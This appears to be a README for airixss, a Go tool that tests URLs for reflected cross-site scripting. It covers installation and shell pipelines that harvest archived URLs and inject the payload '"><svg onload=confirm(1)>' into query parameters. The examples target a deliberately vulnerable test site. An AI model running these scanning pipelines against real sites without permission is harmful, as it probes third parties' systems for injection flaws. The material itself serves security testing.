Installing the tool ->
Using go
▶ go install github.com/ferreiraklet/airixss@latestUsing git clone
▶ git clone https://github.com/ferreiraklet/airixss.git
▶ cd airixss
▶ go build airixss.go
▶ chmod +x airixss
▶ ./airixss -hIn Your recon process, you may find endpoints that can be vulnerable to xss,
-
Ex:
https://redacted.com/index.php?msg=SameValue -
By replacing the "SameValue" to a xss payload, In order to see if there is reflection/vulnerable, it is when you use airixss
Attention
If you want to test xss, then, for better results, please provide the full payload in -p tag, Ex: -p '"><svg onload=confirm(1)>'
echo 'https://redacted.com/index.php?user=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E' | airixss -payload '"><svg onload=confirm(1)>'
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | bhedak '"><svg onload=confirm(1)>' | airixss -p '"><svg onload=confirm(1)>'In -payload flag, you need to specify a part of the payload used in url, -payload "value_will_be_checked_reflection"
cat targets | airixss -payload '"><svg onload=confirm(1)>'Pay attention to the syntax!
echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -H "header1: value1" -H "header2: value2"echo "http://testphp.vulnweb.com:80/hpp/index.php?pp=x" | qsreplace '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -x "http://yourproxy"echo "http://testphp.vulnweb.com" | waybackurls | anew | gf xss | qsreplace '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -H "Header1: Value1"
echo "http://testphp.vulnweb.com" | waybackurls | nilo | anew | gf xss | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" --proxy "http://yourproxy"
echo "http://testphp.vulnweb.com" | waybackurls | nilo | anew | gf xss | qsreplace -a | bhedak '"><svg onload=confirm(1)>' | airixss -p "confirm(1)" -x "http://yourproxy"
Nilo - Checks if URL has status 200
Jeeves - Time based blind Injection Scanner
If any error in the program, talk to me immediatly.
